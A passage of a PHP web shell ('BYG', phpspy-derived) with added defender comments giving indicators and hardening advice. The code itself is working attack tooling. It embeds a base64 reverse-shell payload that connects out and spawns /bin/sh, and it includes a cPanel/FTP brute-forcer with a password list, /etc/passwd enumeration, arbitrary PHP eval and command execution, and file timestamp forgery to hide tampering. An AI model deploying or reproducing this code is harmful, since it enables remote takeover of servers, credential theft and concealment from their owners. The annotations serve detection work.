1153     $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1154     if ($start && $yourip && $yourport && $use) {
             // Defender note: this is the outbound-connection launcher. It hands one of the two
             // embedded payloads assigned just above ($back_connect / $back_connect_c) to cf() with a
             // fixed path under /tmp, then starts it in the background with the request-supplied
             // address and port ($yourip defaults to the requester's REMOTE_ADDR and $yourport to
             // 12345, set at the top of this branch). cf(), execute() and which() are helpers defined
             // outside this excerpt; presumably write-file, run-command and locate-binary. Confirm
             // against the full file.
             // Host indicators: /tmp/angel_bc and /tmp/angel_bc.c; the web-server account spawning
             // perl or gcc; a new outbound TCP connection from a PHP worker right after a request
             // carrying action=backconnect.
             // Hardening: mount /tmp noexec, keep compilers off web hosts, default-deny egress from
             // the web tier, and disable PHP process-execution functions via disable_functions.
1155         if ($use == 'perl') {
1156             cf('/tmp/angel_bc', $back_connect);
1157             $res = execute(which('perl') . " /tmp/angel_bc $yourip $yourport &");
1158         } else {
1159             cf('/tmp/angel_bc.c', $back_connect_c);
1160             $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
                 // The C source is removed after compiling, so only the binary /tmp/angel_bc is
                 // left on disk for responders to collect.
1161             @unlink('/tmp/angel_bc.c');
1162             $res = execute("/tmp/angel_bc $yourip $yourport &");
1163         }
1164         m("Now script try connect to $yourip port $yourport ...");
1165     }
1166     formhead(array('title' => 'Back Connect'));
1167     makehide('action', 'backconnect');
1168     p('<p>');
1169     p('Your IP:');
1170     makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip));
1171     p('Your Port:');
1172     makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
1173     p('Use:');
1174     makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
1175     makeinput(array('name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt'));
1176     p('</p>');
1177     formfoot();
1178 } //end backconnect window via NC
1179 // Brute
1180 elseif ($action == 'brute') {
1181     formhead(array('title' => 'Brute Forcer'));
1182     makehide('action', 'brute');
1183     makehide('dir', $brute);
1184     @ini_set('memory_limit', 1000000000000);
         // Defender note: the memory limit is raised above and the execution time limit is removed
         // below, so a single HTTP request can run a long credential-guessing loop. All inputs come
         // from $_REQUEST; the form printed further down offers the option values 'cpanel' and 'ftp',
         // and $target falls back to 'localhost' when empty.
         // Detection: unusually long-lived PHP requests carrying action=brute, and bursts of failed
         // cPanel/FTP logins whose source is the web host itself (often loopback), so throttling
         // keyed only on remote client IP can miss it. Per-account lockout or throttling still applies.
1185     $connect_timeout = 5;
1186     @set_time_limit(0);
1187     $submit = $_REQUEST['submit'];
1188     $users = $_REQUEST['users'];
1189     $pass = $_REQUEST['passwords'];
1190     $target = $_REQUEST['target'];
1191     $option = $_REQUEST['option'];
1192     $passlist = "0123456
1193 01234567
1194 012345678
1195 0123456789
1196 01234567890
1197 123456
1198 1234567
1199 12345678
1200 123456789
1201 1234567890
1202 111111
1203 000000
1204 222222
1205 333333
1206 444444
1207 555555
1208 666666
1209 777777
1210 888888
1211 999999
1212 123123
1213 456456
1214 789789
1215 123321
1216 456654
1217 654321
1218 7654321
1219 87654321
1220 987654321
1221 0987654321
1222 admin
1223 administrator
1224 admincp
1225 cpanel
1226 adminx
1227 admins
1228 password
1229 passwords
1230 passw0rd
1231 p@ssw0rd
1232 p@ssword
1233 khongco
1234 25251325
1235 passw0rds";
1236     if ($target == '') {
1237         $target = 'localhost';
1238     }
1239     print " <div align='center'>
1240 <form method='post' style='border: 1px solid #000000'><br><br>
1241 <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
1242 <b> Target  : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
1243 <div align='center'><br>
1244 <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
1245 <tr>
1246 <td align='center'>
1247 <b>Username</b></td>
1248 <td>
1249 <p align='center'>
1250 <b>Password</b></td>
1251 </tr>
1252 </table>
1253 <p align='center'>
1254 <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
1255     $i = 0;
1256     while ($i < 60000) {
1257         $line = posix_getpwuid($i);
1258         if (!empty($line)) {
1259             while (list($key, $vba_etcpwd) = each($line)) {
1260                 echo "" . $vba_etcpwd . "\n";
1261                 break;
1262             }
1263         }
1264         $i++;
1265     }
1266     echo "
1267 </textarea>
1268 <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
1269 <br>
1270 <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
1271 <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
1272 </td></tr></table></td></tr></form><p align= 'left'>";
1273 ?>
1274 <?php
1275     function ftp_check($host, $user, $pass, $timeout) {
1276         $ch = curl_init();
1277         curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1278         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1279         curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1280         curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
1281         curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1282         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1283         curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1284         $data = curl_exec($ch);
1285         if (curl_errno($ch) == 28) {
1286             print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1287             exit;
1288         } elseif (curl_errno($ch) == 0) {
1289             p("<b>[ attack@vbateam.net
1290  ]# </b>
1291 <b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
1292         }
1293         curl_close($ch);
1294     }
1295     function cpanel_check($host, $user, $pass, $timeout) {
1296         $ch = curl_init();
1297         curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
1298         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1299         curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1300         curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1301         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1302         curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1303         $data = curl_exec($ch);
1304         if (curl_errno($ch) == 28) {
1305             print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1306             exit;
1307         } elseif (curl_errno($ch) == 0) {
1308             p("<b>[ attack@vbateam.net
1309  ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");
1310         }
1311         curl_close($ch);
1312     }
1313     if (isset($submit) && !empty($submit)) {
1314         $userlist = explode("\n", $users);
1315         $passlist = explode("\n", $pass);
1316         p('<b>[ attack@vbateam.net
1317  ]# Attacking ...</font></b><br>');
1318         foreach ($userlist as $user) {
1319             $_user = trim($user);
1320             foreach ($passlist as $password) {
1321                 $_pass = trim($password);
1322                 if ($option == "ftp") {
1323                     ftp_check($target, $_user, $_pass, $connect_timeout);
1324                 }
1325                 if ($option == "cpanel") {
1326                     cpanel_check($target, $_user, $_pass, $connect_timeout);
1327                 }
1328             }
1329         }
1330     }
1331     formfoot();
1332 } elseif ($action == 'etcpwd') {
1333     formhead(array('title' => 'Get /etc/passwd'));
1334     makehide('action', 'etcpwd');
1335     makehide('dir', $nowpath);
1336     $i = 0;
1337     echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
1338     while ($i < 60000) {
1339         $line = posix_getpwuid($i);
1340         if (!empty($line)) {
1341             while (list($key, $vba_etcpwd) = each($line)) {
1342                 echo "" . $vba_etcpwd . "\n";
1343                 break;
1344             }
1345         }
1346         $i++;
1347     }
1348     echo "</textarea></p>";
1349     formfoot();
1350 } elseif ($action == 'eval') {
1351     $phpcode = trim($phpcode);
1352     if ($phpcode) {
1353         if (!preg_match('#<\?#si', $phpcode)) {
1354             $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1355         }
1356         eval("?" . ">$phpcode<?");
1357     }
1358     formhead(array('title' => 'Eval PHP Code'));
1359     makehide('action', 'eval');
1360     maketext(array('title' => 'PHP Code', 'name' => 'phpcode', 'value' => $phpcode));
1361     p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
1362     formfooter();
1363 } //end eval
1364 elseif ($action == 'editfile') {
1365     if (file_exists($opfile)) {
1366         $fp = @fopen($opfile, 'r');
1367         $contents = @fread($fp, filesize($opfile));
1368         @fclose($fp);
1369         $contents = htmlspecialchars($contents);
1370     }
1371     formhead(array('title' => 'Create / Edit File'));
1372     makehide('action', 'file');
1373     makehide('dir', $nowpath);
1374     makeinput(array('title' => 'Current File (import new file name and new file)', 'name' => 'editfilename', 'value' => $opfile, 'newline' => 1));
1375     maketext(array('title' => 'File Content', 'name' => 'filecontent', 'value' => $contents));
1376     formfooter();
1377 } //end editfile
1378 elseif ($action == 'newtime') {
1379     $opfilemtime = @filemtime($opfile);
1380     //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1381     $cachemonth = array('January' => 1, 'February' => 2, 'March' => 3, 'April' => 4, 'May' => 5, 'June' => 6, 'July' => 7, 'August' => 8, 'September' => 9, 'October' => 10, 'November' => 11, 'December' => 12);
1382     formhead(array('title' => 'Clone file was last modified time'));
1383     makehide('action', 'file');
1384     makehide('dir', $nowpath);
1385     makeinput(array('title' => 'Alter file', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1386     makeinput(array('title' => 'Reference file (fullpath)', 'name' => 'tarfile', 'size' => 120, 'newline' => 1));
1387     formfooter();
1388     formhead(array('title' => 'Set last modified'));
1389     makehide('action', 'file');
1390     makehide('dir', $nowpath);
1391     makeinput(array('title' => 'Current file (fullpath)', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1392     p('<p>Instead &raquo;');
1393     p('year:');
1394     makeinput(array('name' => 'year', 'value' => date('Y', $opfilemtime), 'size' => 4));
1395     p('month:');
1396     makeinput(array('name' => 'month', 'value' => date('m', $opfilemtime), 'size' => 2));
1397     p('day:');
1398     makeinput(array('name' => 'day', 'value' => date('d', $opfilemtime), 'size' => 2));
1399     p('hour:');
1400     makeinput(array('name' => 'hour', 'value' => date('H', $opfilemtime), 'size' => 2));
1401     p('minute:');
1402     makeinput(array('name' => 'minute', 'value' => date('i', $opfilemtime), 'size' => 2));
1403     p('second:');
1404     makeinput(array('name' => 'second', 'value' => date('s', $opfilemtime), 'size' => 2));
1405     p('</p>');
1406     formfooter();
1407 } //end newtime
1408 elseif ($action == 'shell') {
1409     if (IS_WIN && IS_COM) {
1410         if ($program && $parameter) {
1411             $shell = new COM('Shell.Application');
1412             $a = $shell->ShellExecute($program, $parameter);
1413             m('Program run has ' . (!$a ? 'success' : 'fail'));
1414         }
1415         !$program && $program = 'c:\windows\system32\cmd.exe';
1416         !$parameter && $parameter = '/c net start > ' . SA_ROOT . 'log.txt';
1417         formhead(array('title' => 'Execute Program'));
1418         makehide('action', 'shell');
1419         makeinput(array('title' => 'Program', 'name' => 'program', 'value' => $program, 'newline' => 1));
1420         p('<p>');
1421         makeinput(array('title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter));
1422         makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1423         p('</p>');
1424         formfoot();
1425     }
1426     formhead(array('title' => 'Execute Command'));
1427     makehide('action', 'shell');
1428     if (IS_WIN && IS_COM) {
1429         $execfuncdb = array('phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open');
1430         makeselect(array('title' => 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline' => 1));
1431     }
1432     p('<p>');
1433     makeinput(array('title' => 'Command', 'name' => 'command', 'value' => $command));
1434     makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1435     p('</p>');
1436     formfoot();
1437     if ($command) {
1438         p('<hr width="100%" noshade /><pre>');
1439         if ($execfunc == 'wscript' && IS_WIN && IS_COM) {
1440             $wsh = new COM('WScript.shell');
1441             $exec = $wsh->exec('cmd.exe /c ' . $command);
1442             $stdout = $exec->StdOut();
1443             $stroutput = $stdout->ReadAll();
1444             echo $stroutput;
1445         } elseif ($execfunc == 'proc_open' && IS_WIN && IS_COM) {
1446             $descriptorspec = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
1447             $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1448             if (is_resource($process)) {
1449                 fwrite($pipes[0], $command . "\r\n");
1450                 fwrite($pipes[0], "exit\r\n");
1451                 fclose($pipes[0]);
1452                 while (!feof($pipes[1])) {
1453                     echo fgets($pipes[1], 1024);
1454                 }
1455                 fclose($pipes[1]);
1456                 while (!feof($pipes[2])) {
1457                     echo fgets($pipes[2], 1024);
1458                 }
1459                 fclose($pipes[2]);
1460                 proc_close($process);
1461             }
1462         } else {
1463             echo (execute($command));
1464         }
1465         p('</pre>');
1466     }
1467 } //end shell
1468 elseif ($action == 'phpenv') {
1469     $upsize = getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1470     $adminmail = isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1471     !$dis_func && $dis_func = 'No';
1472     $info = array(1 => array('Server Time', date('Y/m/d h:i:s', $timestamp)), 2 => array('Server Domain', $_SERVER['SERVER_NAME']), 3 => array('Server IP', gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS', PHP_OS), 5 => array('Server OS Charset', $_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software', $_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port', $_SERVER['SERVER_PORT']), 8 => array('PHP run mode', strtoupper(php_sapi_name())), 9 => array('The file path', __FILE__), 10 => array('PHP Version', PHP_VERSION), 11 => array('PHPINFO', (IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')), 12 => array('Safe Mode', getcfg('safe_mode')), 13 => array('Administrator', $adminmail), 14 => array('allow_url_fopen', getcfg('allow_url_fopen')), 15 => array('enable_dl', getcfg('enable_dl')), 16 => array('display_errors', getcfg('display_errors')), 17 => array('register_globals', getcfg('register_globals')), 18 => array('magic_quotes_gpc', getcfg('magic_quotes_gpc')), 19 => array('memory_limit', getcfg('memory_limit')), 20 => array('post_max_size', getcfg('post_max_size')), 21 => array('upload_max_filesize', $upsize), 22 => array('max_execution_time', getcfg('max_execution_time') . ' second(s)'), 23 => array('disable_functions', $dis_func),);
1473     if ($phpvarname) {
1474         m($phpvarname . ' : ' . getcfg($phpvarname));
1475     }
1476     formhead(array('title' => 'Server environment'));
1477     makehide('action', 'phpenv');
1478     makeinput(array('title' => 'Please input PHP configuration parameter(eg:magic_quotes_gpc)', 'name' => 'phpvarname', 'value' => $phpvarname, 'newline' => 1));
1479     formfooter();
1480     $hp = array(0 => 'Server', 1 => 'PHP');
1481     for ($a = 0;$a < 2;$a++) {
1482         p('<h2>' . $hp[$a] . ' &raquo;</h2>');
1483         p('<ul class="info">');
1484         if ($a == 0) {
1485             for ($i = 1;$i <= 9;$i++) {
1486                 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1487             }
1488         } elseif ($a == 1) {
1489             for ($i = 10;$i <= 23;$i++) {
1490                 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1491             }
1492         }
1493         p('</ul>');
1494     }
1495 } //end phpenv
1496 else {
1497     m('Undefined Action');
1498 }
1499 ?>
1500 </td></tr></table>
1501 <div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
1502    <span style="float:right;"><?php debuginfo();
1503 ob_end_flush(); ?></span>
1504    Copyright (C) 2004-2010 <B></B> - Develop by <a href=http://beyeugroup.com target=_blank><B>BYG   </B></a> - <B>- The Legend of Vietnamese Hacker World</B> All Rights Reserved.
1505 </div>
1506 </body>
1507 </html>
1508 
1509 <?php
1510 /*======================================================
1511 Show info shell
1512 ======================================================*/
/**
 * Print a status message inside a centred, bordered banner.
 *
 * The message is written to the response as given; no HTML escaping happens
 * here, so whatever markup the caller passes reaches the page unchanged.
 *
 * @param string $msg Text or markup to display.
 */
function m($msg) {
    $banner_open = '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
    echo $banner_open . $msg . '</div>';
}
/**
 * Set a cookie using the settings held in the global $admin array.
 *
 * @param string $key    Cookie name; $admin['cookiepre'] is prepended when $prefix is truthy.
 * @param string $value  Cookie value, handed to setcookie() unchanged.
 * @param int    $life   Lifetime in seconds; 0 falls back to $admin['cookielife'].
 * @param int    $prefix Whether to apply the configured name prefix.
 */
function scookie($key, $value, $life = 0, $prefix = 1) {
    global $admin, $timestamp, $_SERVER;
    $key = ($prefix ? $admin['cookiepre'] : '') . $key;
    $life = $life ? $life : $admin['cookielife'];
    // The Secure flag is derived from the port alone: it is set only when the
    // request arrived on 443.
    $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
    // No HttpOnly argument is passed, so the cookie stays readable from page script.
    // NOTE(review): $timestamp is a global assigned outside this view - presumably
    // the request time; confirm.
    setcookie($key, $value, $timestamp + $life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
}
/**
 * Build the "Pages: First Prev [n] ... Next Last" navigation strip.
 *
 * Every link is a javascript: URL calling settable(tablename, '', page); that
 * script function is defined outside this view. Up to $page (10) numbered
 * links are shown, with the window positioned $offset (5) entries before the
 * current page and clamped to the valid range.
 *
 * @param int    $num       Total number of rows.
 * @param int    $perpage   Rows per page.
 * @param int    $curpage   Current page number (the `$from < 1` clamp suggests 1-based).
 * @param string $tablename Placed inside the generated javascript: URLs without escaping.
 * @return string HTML fragment, or '' when everything fits on one page.
 */
function multi($num, $perpage, $curpage, $tablename) {
    $multipage = '';
    if ($num > $perpage) {
        $page = 10;
        $offset = 5;
        // @ hides the division warning when $perpage is 0.
        $pages = @ceil($num / $perpage);
        if ($page > $pages) {
            // Fewer pages than the window size: show them all.
            $from = 1;
            $to = $pages;
        } else {
            $from = $curpage - $offset;
            $to = $curpage + $page - $offset - 1;
            if ($from < 1) {
                // Window ran off the left edge: pin it to page 1.
                $to = $curpage + 1 - $from;
                $from = 1;
                if (($to - $from) < $page && ($to - $from) < $pages) {
                    $to = $page;
                }
            } elseif ($to > $pages) {
                // Window ran off the right edge: pin it to the last page.
                $from = $curpage - $pages + $to;
                $to = $pages;
                if (($to - $from) < $page && ($to - $from) < $pages) {
                    $from = $pages - $page + 1;
                }
            }
        }
        // "First" appears only once the window has moved away from page 1.
        $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', 1);">First</a> ' : '') . ($curpage > 1 ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage - 1) . ');">Prev</a> ' : '');
        for ($i = $from;$i <= $to;$i++) {
            // The current page is printed as plain text, the others as links.
            $multipage.= $i == $curpage ? $i . ' ' : '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $i . ');">[' . $i . ']</a> ';
        }
        $multipage.= ($curpage < $pages ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage + 1) . ');">Next</a>' : '') . ($to < $pages ? ' <a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $pages . ');">Last</a>' : '');
        $multipage = $multipage ? '<p>Pages: ' . $multipage . '</p>' : '';
    }
    return $multipage;
}
1560 // Login page
/**
 * Emit the password prompt page and end the request.
 *
 * The form posts a `password` field and a hidden `doing=login` field back to
 * the same URL; the code that checks them is outside this view. The function
 * never returns because it finishes with exit.
 *
 * Defender note: the fixed page title and the hidden `doing=login` field are
 * constant strings in this file, which makes them usable as content
 * signatures when scanning a web root or captured responses for this script.
 */
function loginpage() {
?>
<html>
<head>

<body bgcolor=black background=1.jpg>

       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>BYG - The Legend of Vietnamese Hacker World </title>
<style type="text/css">
A:link {text-decoration: none; color: green }
A:visited {text-decoration: none;color:red}
A:active {text-decoration: none}
A:hover {text-decoration: underline; color: green;}
input, textarea, button
{
   font-size: 11pt;
   color:  #FFFFFF;
   font-family: verdana, sans-serif;
   background-color: #000000;
   border-left: 2px dashed #8B0000;
   border-top: 2px dashed #8B0000;
   border-right: 2px dashed #8B0000;
   border-bottom: 2px dashed #8B0000;
}

</style>

       <BR><BR>
<div align=center >

<div>
<font color=gray>
<br /><br /><br /><br /><br />

<form method="POST" action="">
   <span style="font:20pt tahoma;"> </span><input name="password" type="password" size="30">
   <input type="hidden" name="doing" value="login">
   <input type="submit" value="Login">
   </form>
<BR>
<?php
    // $err_mess is neither a parameter nor declared global in this function,
    // so it is undefined in this scope and this prints an empty string.
    echo "" . $err_mess . "";
?>

   <B><font color=red>






</div>


   </fieldset>



</head>
</html>


<?php
    // Stop here so nothing after the login form is rendered.
    exit;
} //end loginpage()
/**
 * Run an operating-system command and return what it printed.
 *
 * The PHP process-execution functions are tried in a fixed order - exec,
 * shell_exec, system, passthru, then popen - and the first one that
 * function_exists() reports (or, for popen, that yields a resource) is used.
 * Every call is prefixed with @, so failures raise no warning from here.
 *
 * Defender note: the command string reaches the shell unmodified, and in this
 * file it originates from request parameters (see the 'shell' action, which
 * echoes execute($command)). Listing these five functions in the php.ini
 * `disable_functions` directive closes every branch of this function; child
 * processes started by the web-server account are the runtime signal to
 * alert on.
 *
 * @param string $cfe Command line to run; a falsy value skips execution.
 * @return string|null Captured output, '' when nothing ran.
 */
function execute($cfe) {
    $res = '';
    if ($cfe) {
        if (function_exists('exec')) {
            // exec() fills $res with an array of output lines; they are
            // re-joined with newlines.
            @exec($cfe, $res);
            $res = join("\n", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('system')) {
            // system() prints directly, so the output is captured with a
            // temporary output buffer.
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            // Same buffering approach as the system() branch.
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            // Last resort: read the child's stdout through a pipe in 1 KiB chunks.
            $res = '';
            while (!@feof($f)) {
                $res.= @fread($f, 1024);
            }
            @pclose($f);
        }
    }
    return $res;
}
/**
 * Resolve a program name to a path by running the `which` command.
 *
 * $pr is interpolated into the command line with no quoting or escaping, so
 * the resulting command is only as trustworthy as the caller's argument.
 *
 * @param string $pr Program name to look up.
 * @return string Output of `which` as returned by execute(), or $pr unchanged
 *                when the lookup produced nothing.
 */
function which($pr) {
    $path = execute("which $pr");
    return ($path ? $path : $pr);
}
/**
 * Base64-decode a string and write the result to a file.
 *
 * The file is opened in 'w' mode, so existing content at $fname is truncated.
 * All calls are @-silenced and nothing is returned, so the caller cannot tell
 * whether the write succeeded.
 *
 * Defender note: presumably this is used to drop files that the script carries
 * as base64 text - the callers are outside this view. Files newly created by
 * the web-server account in web-writable directories are the artefact to
 * monitor for.
 *
 * @param string $fname Destination path.
 * @param string $text  Base64-encoded content.
 */
function cf($fname, $text) {
    if ($fp = @fopen($fname, 'w')) {
        @fputs($fp, base64_decode($text));
        @fclose($fp);
    }
}
1665 // Debug
/**
 * Print how long the request has been running.
 *
 * Reads the global $starttime (seconds as a float, set at the top of the
 * script) and echoes the elapsed time with six decimal places.
 */
function debuginfo() {
    global $starttime;
    // microtime() returns "fraction seconds"; add both parts to get a float.
    list($fraction, $seconds) = explode(' ', microtime());
    $elapsed = $seconds + $fraction - $starttime;
    echo 'Processed in ' . number_format($elapsed, 6) . ' second(s)';
}
1672 // Function connect database
/**
 * Open a MySQL connection through the legacy mysql_* extension.
 *
 * On connection or database-selection failure a heading is printed with p()
 * (defined outside this view) and the request ends with exit, so callers only
 * ever see a working link.
 *
 * The mysql_* functions used here were removed in PHP 7.0, so this code only
 * runs on older interpreters.
 *
 * @param string $dbhost  Server host name.
 * @param string $dbuser  Account name.
 * @param string $dbpass  Account password.
 * @param string $dbname  Optional database to select.
 * @param string $charset Optional connection charset; only gbk, big5 and utf8 are applied.
 * @param string $dbport  TCP port, appended to the host as "host:port".
 * @return resource Link identifier returned by mysql_connect().
 */
function dbconn($dbhost, $dbuser, $dbpass, $dbname = '', $charset = '', $dbport = '3306') {
    if (!$link = @mysql_connect($dbhost . ':' . $dbport, $dbuser, $dbpass)) {
        p('<h2>Can not connect to MySQL server</h2>');
        exit;
    }
    if ($link && $dbname) {
        if (!@mysql_select_db($dbname, $link)) {
            p('<h2>Database selected has error</h2>');
            exit;
        }
    }
    // The version check compares strings, not version numbers. When the server
    // string is not a plain number this is a character-by-character comparison,
    // so a two-digit major version such as "10.x" sorts below '4.1'.
    if ($link && mysql_get_server_info() > '4.1') {
        // $charset is interpolated into the SQL text, but only after it has
        // matched one of the three allowed names.
        if (in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
            // q() is declared with a single parameter in this file; the extra
            // $link argument is ignored.
            q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
        }
    }
    return $link;
}
1691 // Array strip
/**
 * Recursively undo backslash escaping on a string or on every string inside
 * a (possibly nested) array.
 *
 * The argument is taken by reference and modified in place; the cleaned value
 * is also returned. Values that are neither strings nor arrays pass through
 * untouched.
 *
 * @param mixed $array String, array or other value to clean.
 * @return mixed The cleaned value.
 */
function s_array(&$array) {
    if (is_string($array)) {
        $array = stripslashes($array);
        return $array;
    }
    if (is_array($array)) {
        foreach (array_keys($array) as $key) {
            // Copy to a local first: the recursive call needs a variable to bind by reference.
            $item = $array[$key];
            $array[$key] = s_array($item);
        }
    }
    return $array;
}
1702 // HTML Strip
/**
 * Escape text for HTML display while keeping its visual layout.
 *
 * Special characters are escaped with htmlspecialchars() using the
 * interpreter's default flags (whether single quotes are escaped therefore
 * depends on the PHP version), then newlines become <br />, double spaces
 * become two &nbsp; and tabs become four &nbsp;.
 *
 * @param string $content Raw text.
 * @return string HTML-safe text with layout preserved.
 */
function html_clean($content) {
    // str_replace() applies array pairs one after another, in this order.
    $search = array("\n", "  ", "\t");
    $replace = array("<br />", "&nbsp;&nbsp;", "&nbsp;&nbsp;&nbsp;&nbsp;");
    return str_replace($search, $replace, htmlspecialchars($content));
}
1710 // Chmod
/**
 * Return a file's permission bits as a four-digit octal string (e.g. "0644").
 *
 * @param string $filepath Path to inspect; errors from fileperms() are silenced.
 * @return string Last four octal digits of the mode.
 */
function getChmod($filepath) {
    $octal = base_convert(@fileperms($filepath), 10, 8);
    // The leading digits encode the file type; only the trailing four are permissions.
    return substr($octal, -4);
}
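/**
 * Render a file's mode as an `ls -l` style ten-character string.
 *
 * The first character is the file type (s socket, l symlink, - regular,
 * b block device, d directory, c character device, p FIFO, ? unknown),
 * followed by the owner, group and world rwx triplets. Setuid and setgid are
 * shown as s/S and the sticky bit as t/T in the respective execute position.
 *
 * @param string $filepath Path to inspect; errors from fileperms() are silenced.
 * @return string Ten-character mode string; "?---------" when the mode cannot be read.
 */
function getPerms($filepath) {
    $mode = @fileperms($filepath);
    // Compare the whole file-type field at once. Testing individual type bits
    // in sequence misreports types whose code contains another type's bit: a
    // block device (0x6000) includes the directory bit (0x4000) and was
    // therefore shown as 'd'.
    switch ($mode & 0xF000) {
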